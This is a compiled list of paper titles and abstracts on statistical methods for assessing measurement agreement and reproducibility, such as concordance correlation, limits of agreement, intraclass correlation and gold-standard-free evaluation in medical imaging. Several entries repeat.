With these three examples we compare and contrast study designs and performance metrics, and we illustrate the advantag... --- paper_title: Statistical Tools for Measuring Agreement paper_content: Introduction. - Basic approach for paired continuous data when target values are random or fixed. - Sample size and power. - Unified approach for continuous and categorical data. --- paper_title: An ROC-type measure of diagnostic accuracy when the gold standard is continuous-scale. paper_content: ROC curves and summary measures of accuracy derived from them, such as the area under the ROC curve, have become the standard for describing and comparing the accuracy of diagnostic tests. Methods for estimating ROC curves rely on the existence of a gold standard which dichotomizes patients into disease present or absent. There are, however, many examples of diagnostic tests whose gold standards are not binary-scale, but rather continuous-scale. Unnatural dichotomization of these gold standards leads to bias and inconsistency in estimates of diagnostic accuracy. In this paper, we propose a non-parametric estimator of diagnostic test accuracy which does not require dichotomization of the gold standard. This estimator has an interpretation analogous to the area under the ROC curve. We propose a confidence interval for test accuracy and a statistical test for comparing accuracies of tests from paired designs. We compare the performance (i.e. CI coverage, type I error rate, power) of the proposed methods with several alternatives. An example is presented where the accuracies of two quick blood tests for measuring serum iron concentrations are estimated and compared. --- paper_title: Modeling Concordance Correlation via GEE to Evaluate Reproducibility paper_content: Summary. Clinical studies are often concerned with assessing whether different raters/methods produce similar values for measuring a quantitative variable. Use of the concordance correlation coefficient as a measure of reproducibility has gained popularity in practice since its introduction by Lin (1989, Biometrics45, 255–268). Lin's method is applicable for studies evaluating two raters/two methods without replications. Chinchilli et al. (1996, Biometrics52, 341–353) extended Lin's approach to repeated measures designs by using a weighted concordance correlation coefficient. However, the existing methods cannot easily accommodate covariate adjustment, especially when one needs to model agreement. In this article, we propose a generalized estimating equations (GEE) approach to model the concordance correlation coefficient via three sets of estimating equations. The proposed approach is flexible in that (1) it can accommodate more than two correlated readings and test for the equality of dependent concordant correlation estimates; (2) it can incorporate covariates predictive of the marginal distribution; (3) it can be used to identify covariates predictive of concordance correlation; and (4) it requires minimal distribution assumptions. A simulation study is conducted to evaluate the asymptotic properties of the proposed approach. The method is illustrated with data from two biomedical studies. --- paper_title: A Concordance Correlation Coefficient to Evaluate Reproducibility paper_content: A new reproducibility index is developed and studied. This index is the correlation between the two readings that fall on the 45 degree line through the origin. It is simple to use and possesses desirable properties. 
The statistical properties of this estimate can be satisfactorily evaluated using an inverse hyperbolic tangent transformation. A Monte Carlo experiment with 5,000 runs was performed to confirm the estimate's validity. An application using actual data is given. --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Evaluating agreement with a gold standard in method comparison studies. paper_content: We develop a statistical model for method comparison studies where a gold standard is present and propose a measure of agreement. This measure can be interpreted as a population correlation coefficient in a constrained bivariate model. An estimator of this coefficient is proposed and its statistical properties explored. Applications of the new methodology to data from the medical literature are presented. --- paper_title: Quantitative imaging biomarkers: A review of statistical methods for technical performance assessment paper_content: Technological developments and greater rigor in the quantitative measurement of biological features in medical images have given rise to an increased interest in using quantitative imaging biomarkers to measure changes in these features. Critical to the performance of a quantitative imaging biomarker in preclinical or clinical settings are three primary metrology areas of interest: measurement linearity and bias, repeatability, and the ability to consistently reproduce equivalent results when conditions change, as would be expected in any clinical trial. Unfortunately, performance studies to date differ greatly in designs, analysis method, and metrics used to assess a quantitative imaging biomarker for clinical use. It is therefore difficult or not possible to integrate results from different studies or to use reported results to design studies. The Radiological Society of North America and the Quantitative Imaging Biomarker Alliance with technical, radiological, and statistical experts developed a set of... --- paper_title: An Overview on Assessing Agreement with Continuous Measurements paper_content: Reliable and accurate measurements serve as the basis for evaluation in many scientific disciplines. 
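The concordance correlation coefficient of the Lin entry above, together with the inverse hyperbolic tangent transformation suggested for its inference, can be sketched directly (sample data and names are illustrative assumptions; the variance expression for the transformed estimate is not shown):

```python
import numpy as np

def concordance_correlation(x, y):
    """Lin's concordance correlation coefficient between paired readings:
    2*cov(x, y) / (var(x) + var(y) + (mean(x) - mean(y))**2).
    It equals 1 only when the points fall exactly on the 45-degree line."""
    x, y = np.asarray(x, float), np.asarray(y, float)
    sxy = np.mean((x - x.mean()) * (y - y.mean()))
    sx2 = np.mean((x - x.mean()) ** 2)
    sy2 = np.mean((y - y.mean()) ** 2)
    return 2.0 * sxy / (sx2 + sy2 + (x.mean() - y.mean()) ** 2)

ccc = concordance_correlation([10.2, 5.1, 7.8, 12.4, 3.3], [9.8, 5.6, 7.2, 12.9, 3.1])
z = np.arctanh(ccc)  # inverse hyperbolic tangent transform used for interval estimation
print(round(ccc, 3), round(z, 3))
```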
Issues related to reliable and accurate measurement have evolved over many decades, dating back to the nineteenth century and the pioneering work of Galton (1886), Pearson (1896, 1899, 1901), and Fisher (1925). Requiring a new measurement to be identical to the truth is often impractical, either because (1) we are willing to accept a measurement up to some tolerable (or acceptable) error, or (2) the truth is simply not available to us, either because it is not measurable or is only measurable with some degree of error. To deal with issues related to both (1) and (2), a number of concepts, methods, and theories have been developed in various disciplines. Some of these concepts have been used across disciplines, while others have been limited to a particular field but may have potential uses in other disciplines. In this paper, we elucidate and contrast fundamental concepts employed in different disciplines and unite these concepts into one common theme: assessing closeness (agreement) of observations. We focus on assessing agreement with continuous measurements and classify different statistical approaches as (1) descriptive tools; (2) unscaled summary indices based on absolute differences of measurements; and (3) scaled summary indices attaining values between -1 and 1 for various data structures, and for cases with and without a reference. We also identify gaps that require further research and discuss future directions in assessing agreement. --- paper_title: On population and individual bioequivalence. paper_content: In a traditional assessment of the bioequivalence of two formulations of a drug one compares the average bioavailability from the two formulations. Anderson and Hauck argued that in some situations it is not sufficient to demonstrate average bioequivalence, and they proposed a method for the assessment of what they called individual bioequivalence, which essentially is the comparison of the individual responses to the two drug formulations within subjects. In this paper we propose a unified strategy for the assessment of bioequivalence that encompasses new approaches to the assessment of both population bioequivalence, which is the comparison of the marginal or population distributions of bioavailabilities, and individual bioequivalence, which is the comparison of the conditional or within-subject distributions of bioavailabilities. The general idea is to use a comparison of the reference formulation to itself as the basis for the comparison of the test with the reference formulation. The new approaches overcome the main weakness of the current methods for the assessment of bioequivalence by considering the variability of bioavailabilities in addition to their means. The current methods for the assessment of bioequivalence, namely the conventional assessment of average bioequivalence and the proposal by Anderson and Hauck for the assessment of individual bioequivalence, emerge as special cases. One can evaluate the new bioequivalence criteria statistically by use of bootstrap confidence intervals. --- paper_title: Assessment of agreement using intersection-union principle. paper_content: We consider the problem of assessing agreement between two instruments and test whether the normally distributed bivariate data have evidence to claim satisfactory agreement. We focus on a comprehensive intersection-union formulation of the hypotheses of agreement. 
Confidence intervals associated with this approach provide information regarding the extent of agreement and nature of disagreement. We illustrate the suggested methodology using a dataset from the literature. --- paper_title: Assessing individual agreement. paper_content: Evaluating agreement between measurement methods or between observers is important in method comparison studies and in reliability studies. Often we are interested in whether a new method can replace an existing invasive or expensive method, or whether multiple methods or multiple observers can be used interchangeably. Ideally, interchangeability is established only if individual measurements from different methods are similar to replicated measurements from the same method. This is the concept of individual equivalence. Interchangeability between methods is similar to bioequivalence between drugs in bioequivalence studies. Following the FDA guidelines on individual bioequivalence, we propose to assess individual agreement among multiple methods via individual equivalence using the moment criteria. In the case where there is a reference method, we extend the individual bioequivalence criteria to individual equivalence criteria and propose to use individual equivalence coefficient (IEC) to compare multiple methods to one or multiple references. In the case where there is no reference method available, we propose a new IEC to assess individual agreement between multiple methods. Furthermore, we propose a coefficient of individual agreement (CIA) that links the IEC with two recent agreement indices. A method of moments is used for estimation, where one can utilize output from ANOVA models. The nonparametric and bootstrap approaches are used for inference. Five examples are used for illustration. --- paper_title: Tests for assessment of agreement using probability criteria paper_content: Abstract For the assessment of agreement using probability criteria, we obtain an exact test, and for sample sizes exceeding 30, we give a bootstrap- t test that is remarkably accurate. We show that for assessing agreement, the total deviation index approach of Lin [2000. Total deviation index for measuring individual agreement with applications in laboratory performance and bioequivalence. Statist. Med. 19, 255–270] is not consistent and may not preserve its asymptotic nominal level, and that the coverage probability approach of Lin et al. [2002. Statistical methods in assessing agreement: models, issues and tools. J. Amer. Statist. Assoc. 97, 257–270] is overly conservative for moderate sample sizes. We also show that the nearly unbiased test of Wang and Hwang [2001. A nearly unbiased test for individual bioequivalence problems using probability criteria. J. Statist. Plann. Inference 99, 41–58] may be liberal for large sample sizes, and suggest a minor modification that gives numerically equivalent approximation to the exact test for sample sizes 30 or less. We present a simple and accurate sample size formula for planning studies on assessing agreement, and illustrate our methodology with a real data set from the literature. 
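The total deviation index and coverage probability discussed in the agreement-testing entries above have straightforward empirical versions; the sketch below is a plug-in calculation from paired differences, not the parametric estimators or the exact and bootstrap-t tests described in those papers (data, bound, and names are assumptions):

```python
import numpy as np

def empirical_tdi(method_a, method_b, p=0.10):
    """Empirical total deviation index: the boundary such that 100*(1-p)% of the
    absolute differences between methods fall within it."""
    d = np.abs(np.asarray(method_a, float) - np.asarray(method_b, float))
    return np.quantile(d, 1.0 - p)

def coverage_probability(method_a, method_b, delta=0.5):
    """Empirical coverage probability: the proportion of absolute differences that
    fall within a pre-specified, clinically acceptable bound delta."""
    d = np.abs(np.asarray(method_a, float) - np.asarray(method_b, float))
    return float(np.mean(d <= delta))

a = [10.2, 5.1, 7.8, 12.4, 3.3, 8.8, 6.0, 9.5, 4.4, 11.1]
b = [9.8, 5.6, 7.2, 12.9, 3.1, 8.1, 6.4, 9.0, 4.9, 10.6]
print(round(empirical_tdi(a, b), 2), coverage_probability(a, b))
```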
--- paper_title: An Introduction to the Bootstrap paper_content: Introduction. The Accuracy of a Sample Mean. Random Samples and Probabilities. The Empirical Distribution Function and the Plug-In Principle. Standard Errors and Estimated Standard Errors. The Bootstrap Estimate of Standard Error. Bootstrap Standard Errors: Some Examples. More Complicated Data Structures. Regression Models. Estimates of Bias. The Jackknife. Confidence Intervals Based on Bootstrap "Tables". Confidence Intervals Based on Bootstrap Percentiles. Better Bootstrap Confidence Intervals. Permutation Tests. Hypothesis Testing with the Bootstrap. Cross-Validation and Other Estimates of Prediction Error. Adaptive Estimation and Calibration. Assessing the Error in Bootstrap Estimates. A Geometrical Representation for the Bootstrap and Jackknife. An Overview of Nonparametric and Parametric Inference. Further Topics in Bootstrap Confidence Intervals. Efficient Bootstrap Computations. Approximate Likelihoods. Bootstrap Bioequivalence. Discussion and Further Topics. Appendix: Software for Bootstrap Computations. References. --- paper_title: Evaluating estimation techniques in medical imaging without a gold standard: experimental validation paper_content: Imaging is often used for the purpose of estimating the value of some parameter of interest. For example, a cardiologist may measure the ejection fraction (EF) of the heart to quantify how much blood is being pumped out of the heart on each stroke. In clinical practice, however, it is difficult to evaluate an estimation method because the gold standard is not known, e.g., a cardiologist does not know the true EF of a patient. An estimation method is typically evaluated by plotting its results against the results of another (more accepted) estimation method. This approach results in the use of one set of estimates as the pseudo-gold standard. We have developed a maximum-likelihood approach for comparing different estimation methods to the gold standard without the use of the gold standard. In previous works we have displayed the results of numerous simulation studies indicating the method can precisely and accurately estimate the parameters of a regression line without a gold standard, i.e., without the x-axis. In an attempt to further validate our method we have designed an experiment performing volume estimation using a physical phantom and two imaging systems (SPECT, CT). --- paper_title: Estimation in Medical Imaging without a Gold Standard paper_content: Rationale and Objectives: In medical imaging, physicians often estimate a parameter of interest (e.g., cardiac ejection fraction) for a patient to assist in establishing a diagnosis. Many different estimation methods may exist, but rarely can one be considered a gold standard. Therefore, evaluation and comparison of different estimation methods are difficult. The purpose of this study was to examine a method of evaluating different estimation methods without use of a gold standard. --- paper_title: The Use and Misuse of Orthogonal Regression in Linear Errors-in-Variables Models paper_content: Orthogonal regression is one of the standard linear regression methods to correct for the effects of measurement error in predictors. We argue that orthogonal regression is often misused in errors-in-variables linear regression because of a failure to account for equation errors. The typical result is to overcorrect for measurement error, that is, overestimate the slope, because equation error is ignored.
The use of orthogonal regression must include a careful assessment of equation error, and not merely the usual (often informal) estimation of the ratio of measurement error variances. There are rarer instances, for example, an example from geology discussed here, where the use of orthogonal regression without proper attention to modeling may lead to either overcorrection or undercorrection, depending on the relative sizes of the variances involved. Thus our main point, which does not seem to be widely appreciated, is that orthogonal regression, just like any measurement error analysis, requires ... --- paper_title: Modelling method comparison data paper_content: We explore a range of linear regression models that might be useful for either: (a) the relative calibration of two or more methods or (b) to evaluate their precisions relative to each other. Ideally, one should be able to use a single data set to carry out the jobs (a) and (b) together. Throughout this review we consider the constraints (assumptions) needed to attain identifiability of the models and the possible pitfalls to the unwary in having to introduce them. We also pay particular attention to the possible problems arising from the presence of random matrix effects (reproducible random measurement 'errors' that are characteristic of a given method when being used on a given specimen or sample, i.e. specimen specific biases or subject by method interactions). Finally, we stress the importance of a fully-informative design (using replicate measurements on each subject using at least three independent methods) and large sample sizes. --- paper_title: Objective Comparison of Quantitative Imaging Modalities Without the Use of a Gold Standard paper_content: Imaging is often used for the purpose of estimating the value of some parameter of interest. For example, a cardiologist may measure the ejection fraction (EF) of the heart in order to know how much blood is being pumped out of the heart on each stroke. In clinical practice, however, it is difficult to evaluate an estimation method because the gold standard is not known, e.g., a cardiologist does not know the true EF of a patient. Thus, researchers have often evaluated an estimation method by plotting its results against the results of another (more accepted) estimation method, which amounts to using one set of estimates as the pseudogold standard. In this paper, we present a maximum-likelihood approach for evaluating and comparing different estimation methods without the use of a gold standard with specific emphasis on the problem of evaluating EF estimation methods. Results of numerous simulation studies will be presented and indicate that the method can precisely and accurately estimate the parameters of a regression line without a gold standard, i.e., without the x axis. --- paper_title: Validation of image segmentation by estimating rater bias and variance paper_content: The accuracy and precision of segmentations of medical images has been difficult to quantify in the absence of a 'ground truth' or reference standard segmentation for clinical data. Although physical or digital phantoms can help by providing a reference standard, they do not allow the reproduction of the full range of imaging and anatomical characteristics observed in clinical data. An alternative assessment approach is to compare with segmentations generated by domain experts. Segmentations may be generated by raters who are trained experts or by automated image analysis algorithms. 
Typically, these segmentations differ due to intra-rater and inter-rater variability. The most appropriate way to compare such segmentations has been unclear. We present here a new algorithm to enable the estimation of performance characteristics, and a true labelling, from observations of segmentations of imaging data where segmentation labels may be ordered or continuous measures. This approach may be used with, among others, surface, distance transform or level-set representations of segmentations, and can be used to assess whether or not a rater consistently overestimates or underestimates the position of a boundary. --- paper_title: Estimation in Medical Imaging without a Gold Standard paper_content: Rationale and Objectives: In medical imaging, physicians often estimate a parameter of interest (e.g., cardiac ejection fraction) for a patient to assist in establishing a diagnosis. Many different estimation methods may exist, but rarely can one be considered a gold standard. Therefore, evaluation and comparison of different estimation methods are difficult. The purpose of this study was to examine a method of evaluating different estimation methods without use of a gold standard. --- paper_title: Objective Comparison of Quantitative Imaging Modalities Without the Use of a Gold Standard paper_content: Imaging is often used for the purpose of estimating the value of some parameter of interest. For example, a cardiologist may measure the ejection fraction (EF) of the heart in order to know how much blood is being pumped out of the heart on each stroke. In clinical practice, however, it is difficult to evaluate an estimation method because the gold standard is not known, e.g., a cardiologist does not know the true EF of a patient. Thus, researchers have often evaluated an estimation method by plotting its results against the results of another (more accepted) estimation method, which amounts to using one set of estimates as the pseudo-gold standard. In this paper, we present a maximum-likelihood approach for evaluating and comparing different estimation methods without the use of a gold standard, with specific emphasis on the problem of evaluating EF estimation methods. Results of numerous simulation studies will be presented and indicate that the method can precisely and accurately estimate the parameters of a regression line without a gold standard, i.e., without the x axis. --- paper_title: A New Biometrical Procedure for Testing the Equality of Measurements from Two Different Analytical Methods. Application of linear regression procedures for method comparison studies in Clinical Chemistry, Part I paper_content: Procedures for the statistical evaluation of method comparisons and instrument tests often have a requirement for distributional properties of the experimental data, but this requirement is frequently not met. In our paper we propose a new linear regression procedure with no special assumptions regarding the distribution of the samples and the measurement errors. The result does not depend on the assignment of the methods (instruments) to X and Y. After testing a linear relationship between X and Y, confidence limits are given for the slope beta and the intercept alpha; they are used to determine whether there is only a chance difference between beta and 1 and between alpha and 0. The mathematical background is amplified separately in an appendix.
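Several entries above concern regression for method comparison when both measurements carry error; as one concrete illustration, the sketch below computes the classical Deming regression slope and intercept assuming a known ratio of error variances (a ratio of 1 gives orthogonal regression). This is the standard textbook estimator, not the distribution-free procedure of the biometrical entry directly above, and the data are invented:

```python
import math

def deming_regression(x, y, error_variance_ratio=1.0):
    """Deming regression of y on x when both are measured with error.
    error_variance_ratio is var(error in y) / var(error in x); a ratio of 1
    gives orthogonal regression. Returns (slope, intercept)."""
    n = len(x)
    mx, my = sum(x) / n, sum(y) / n
    sxx = sum((xi - mx) ** 2 for xi in x) / (n - 1)
    syy = sum((yi - my) ** 2 for yi in y) / (n - 1)
    sxy = sum((xi - mx) * (yi - my) for xi, yi in zip(x, y)) / (n - 1)
    lam = error_variance_ratio
    slope = (syy - lam * sxx + math.sqrt((syy - lam * sxx) ** 2 + 4 * lam * sxy ** 2)) / (2 * sxy)
    return slope, my - slope * mx

x = [3.3, 5.1, 6.0, 7.8, 9.5, 10.2, 11.1, 12.4]
y = [3.6, 5.4, 6.1, 8.2, 9.1, 10.8, 11.6, 12.9]
print(deming_regression(x, y))
```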
--- paper_title: Modelling method comparison data paper_content: We explore a range of linear regression models that might be useful for either: (a) the relative calibration of two or more methods or (b) to evaluate their precisions relative to each other. Ideally, one should be able to use a single data set to carry out the jobs (a) and (b) together. Throughout this review we consider the constraints (assumptions) needed to attain identifiability of the models and the possible pitfalls to the unwary in having to introduce them. We also pay particular attention to the possible problems arising from the presence of random matrix effects (reproducible random measurement 'errors' that are characteristic of a given method when being used on a given specimen or sample, i.e. specimen specific biases or subject by method interactions). Finally, we stress the importance of a fully-informative design (using replicate measurements on each subject using at least three independent methods) and large sample sizes. --- paper_title: Regression Models for Method Comparison Data paper_content: Regression methods for the analysis of paired measurements produced by two fallible assay methods are described and their advantages and pitfalls discussed. The difficulties for the analysis, as in any errors-in-variables problem lies in the lack of identifiability of the model and the need to introduce questionable and often naive assumptions in order to gain identifiability. Although not a panacea, the use of instrumental variables and associated instrumental variable (IV) regression methods in this area of application has great potential to improve the situation. Large samples are frequently needed and two-phase sampling methods are introduced to improve the efficiency of the IV estimators. --- paper_title: A missing information principle: theory and applications paper_content: Abstract : The problem that a relatively simple analysis is changed into a complex one just because some of the information is missing, is one which faces most practicing statisticians at some point in their career. Obviously the best way to treat missing information problems is not to have them. Unfortunately circumstances arise in which information is missing and nothing can be done to replace it for one reason or another. --- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... 
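The orthogonal and errors-in-variables regression issues raised in the method-comparison references above can be made concrete with a short Deming regression sketch. It assumes a known ratio of the two methods' measurement error variances (here set arbitrarily); with the ratio equal to 1 the fit reduces to orthogonal regression, and the data are hypothetical:

    import numpy as np

    # Paired measurements of the same specimens by two error-prone methods (illustrative values)
    x = np.array([1.2, 2.4, 3.1, 4.0, 5.2, 6.1, 7.3, 8.0])
    y = np.array([1.0, 2.6, 3.0, 4.3, 5.0, 6.4, 7.1, 8.4])
    delta = 1.0   # assumed ratio var(error in y) / var(error in x); 1.0 gives orthogonal regression

    sxx = x.var(ddof=1)
    syy = y.var(ddof=1)
    sxy = np.cov(x, y)[0, 1]

    # Closed-form Deming slope and intercept
    slope = (syy - delta * sxx + np.sqrt((syy - delta * sxx) ** 2 + 4 * delta * sxy ** 2)) / (2 * sxy)
    intercept = y.mean() - slope * x.mean()
    print(f"slope = {slope:.3f}, intercept = {intercept:.3f}")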
--- paper_title: Statistical methods in assessing agreement: Models, issues, and tools paper_content: Measurements of agreement are needed to assess the acceptability of a new or generic process, methodology, and formulation in areas of laboratory performance, instrument or assay validation, method comparisons, statistical process control, goodness of fit, and individual bioequivalence. In all of these areas, one needs measurements that capture a large proportion of data that are within a meaningful boundary from target values. Target values can be considered random (measured with error) or fixed (known), depending on the situation. Various meaningful measures to cope with such diverse and complex situations have become available only in the last decade. These measures often assume that the target values are random. This article reviews the literature and presents methodologies in terms of “coverage probability.” In addition, analytical expressions are introduced for all of the aforementioned measurements when the target values are fixed and when the error structure is homogenous or heterogeneous (proport... --- paper_title: Forming inferences about some intraclass correlation coefficients. paper_content: Although intraclass correlation coefficients (ICCs) are commonly used in behavioral measurement, psychometrics, and behavioral genetics, procedures available for forming inferences about ICCs are not widely known. Following a review of the distinction between various forms of the ICC, this article presents procedures available for calculating confidence intervals and conducting tests on ICCs developed using data from one-way and two-way random and mixed-effect analysis of variance models. --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Comparison of ICC and CCC for assessing agreement for data without and with replications paper_content: The intraclass correlation coefficient (ICC) has been traditionally used for assessing reliability between multiple observers for data with or without replications. Definitions of different versions of ICCs depend on the assumptions of specific ANOVA models. The parameter estimator for the ICC is usually based on the method of moments with the underlying assumed ANOVA model. 
This estimator is consistent only if the ANOVA model assumptions hold. Often these ANOVA assumptions are not met in practice and researchers may compute these estimates without verifying the assumptions. ICC is biased if the ANOVA assumptions are not met. We compute the expected value of the ICC estimator under a very general model to get a sense of the population parameter that the ICC estimator provides. We compare this expected value to another popular agreement index, concordance correlation coefficient (CCC), which is defined without ANOVA assumptions. The main findings are reported for data without replication and with replications for three types of ICCs defined by one-way ANOVA model, two-way ANOVA model without interaction and two-way ANOVA model with interaction. A blood pressure example is used for illustration. If the ICC is the choice of agreement index, we recommend using ICC3 over other ICCs as its estimate is similar to the estimate of CCC regardless of whether the ANOVA assumptions are met or not. --- paper_title: Statistical methods in assessing agreement: Models, issues, and tools paper_content: Measurements of agreement are needed to assess the acceptability of a new or generic process, methodology, and formulation in areas of laboratory performance, instrument or assay validation, method comparisons, statistical process control, goodness of fit, and individual bioequivalence. In all of these areas, one needs measurements that capture a large proportion of data that are within a meaningful boundary from target values. Target values can be considered random (measured with error) or fixed (known), depending on the situation. Various meaningful measures to cope with such diverse and complex situations have become available only in the last decade. These measures often assume that the target values are random. This article reviews the literature and presents methodologies in terms of “coverage probability.” In addition, analytical expressions are introduced for all of the aforementioned measurements when the target values are fixed and when the error structure is homogenous or heterogeneous (proport... --- paper_title: STATISTICAL METHODS FOR ASSESSING AGREEMENT BETWEEN TWO METHODS OF CLINICAL MEASUREMENT paper_content: In clinical measurement comparison of a new measurement technique with an established one is often needed to see whether they agree sufficiently for the new to replace the old. Such investigations are often analysed inappropriately, notably by using correlation coefficients. The use of correlation is misleading. An alternative approach, based on graphical techniques and simple calculations, is described, together with the relation between this analysis and the assessment of repeatability. --- paper_title: Five-year lung cancer screening experience: CT appearance, growth rate, location, and histologic features of 61 lung cancers. paper_content: PURPOSE ::: To retrospectively evaluate the computed tomography (CT)-determined size, morphology, location, morphologic change, and growth rate of incidence and prevalence lung cancers detected in high-risk individuals who underwent annual chest CT screening for 5 years and to evaluate the histologic features and stages of these cancers. ::: ::: ::: MATERIALS AND METHODS ::: The study was institutional review board approved and HIPAA compliant. Informed consent was waived.
CT scans of 61 cancers (24 in men, 37 in women; age range, 53-79 years; mean, 65 years) were retrospectively reviewed for cancer size, morphology, and location. Forty-eight cancers were assessed for morphologic change and volume doubling time (VDT), which was calculated by using a modified Schwartz equation. Histologic sections were retrospectively reviewed. ::: ::: ::: RESULTS ::: Mean tumor size was 16.4 mm (range, 5.5-52.5 mm). Most common CT morphologic features were as follows: for bronchioloalveolar carcinoma (BAC) (n = 9), ground-glass attenuation (n = 6, 67%) and smooth (n = 3, 33%), irregular (n = 3, 33%), or spiculated (n = 3, 33%) margin; for non-BAC adenocarcinomas (n = 25), semisolid (n = 11, 44%) or solid (n = 12, 48%) attenuation and irregular margin (n = 14, 56%); for squamous cell carcinoma (n = 14), solid attenuation (n = 12, 86%) and irregular margin (n = 10, 71%); for small cell or mixed small and large cell neuroendocrine carcinoma (n = 7), solid attenuation (n = 6, 86%) and irregular margin (n = 5, 71%); for non-small cell carcinoma not otherwise specified (n = 5), solid attenuation (n = 4, 80%) and irregular margin (n = 3, 60%); and for large cell carcinoma (n = 1), solid attenuation and spiculated shape (n = 1, 100%). Attenuation most often (in 12 of 21 cases) increased. Margins most often (in 16 of 20 cases) became more irregular or spiculated. Mean VDT was 518 days. Thirteen of 48 cancers had a VDT longer than 400 days; 11 of these 13 cancers were in women. ::: ::: ::: CONCLUSION ::: Overdiagnosis, especially in women, may be a substantial concern in lung cancer screening. --- paper_title: Forming inferences about some intraclass correlation coefficients. paper_content: Although intraclass correlation coefficients (ICCs) are commonly used in behavioral measurement, psychometrics, and behavioral genetics, procedures available for forming inferences about ICCs are not widely known. Following a review of the distinction between various forms of the ICC, this article presents procedures available for calculating confidence intervals and conducting tests on ICCs developed using data from one-way and two-way random and mixed-effect analysis of variance models. --- paper_title: On Estimating Precision of Measuring Instruments and Product Variability paper_content: Abstract A measurement or observed value is discussed as the sum of two components—one the absolute value of the characteristic measured and the other an error of measurement. The variation in absolute values of the characteristic or items measured is termed product variability, whereas the variation in errors of measurement of an instrument is called the precision or reproducibility of measurement. Techniques are given for separating and estimating product variability and precision of measurement. Comparisons of the various techniques are also discussed for cases involving two or more instruments. --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. 
We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Comparison of ICC and CCC for assessing agreement for data without and with replications paper_content: The intraclass correlation coefficient (ICC) has been traditionally used for assessing reliability between multiple observers for data with or without replications. Definitions of different versions of ICCs depend on the assumptions of specific ANOVA models. The parameter estimator for the ICC is usually based on the method of moments with the underlying assumed ANOVA model. This estimator is consistent only if the ANOVA model assumptions hold. Often these ANOVA assumptions are not met in practice and researchers may compute these estimates without verifying the assumptions. ICC is biased if the ANOVA assumptions are not met. We compute the expected value of the ICC estimator under a very general model to get a sense of the population parameter that the ICC estimator provides. We compare this expected value to another popular agreement index, concordance correlation coefficient (CCC), which is defined without ANOVA assumptions. The main findings are reported for data without replication and with replications for three types of ICCs defined by one-way ANOVA model, two-way ANOVA model without interaction and two-way ANOVA model with interaction. A blood pressure example is used for illustration. If the ICC is the choice of agreement index, we recommend using ICC3 over other ICCs as its estimate is similar to the estimate of CCC regardless of whether the ANOVA assumptions are met or not. --- paper_title: Assessing reproducibility by the within-subject coefficient of variation with random effects models. paper_content: In this paper we consider the use of within-subject coefficient of variation (WCV) for assessing the reproducibility or reliability of a measurement. Application to assessing reproducibility of biochemical markers for measuring bone turnover is described and the comparison with intraclass correlation is discussed. Both maximum likelihood and moment confidence intervals of WCV are obtained through their corresponding asymptotic distributions. Normal and log-normal cases are considered. In general, WCV is preferred when the measurement scale bears intrinsic meaning and is not subject to arbitrary shifting. The intraclass correlation may be preferred when a fixed population of subjects can be well identified. --- paper_title: Testing Statistical Hypotheses of Equivalence paper_content: Introduction. Methods for One-Sided Equivalence Problems. General Approaches to the Construction of Tests for Equivalence in the Strict Sense. Equivalence Tests for Selected One-Parameter Problems. Equivalence Tests for Designs with Paired Observation. Equivalence Tests for Two Unrelated Samples. Multi-sample Tests for Equivalence. Tests for Establishing Goodness of Fit.
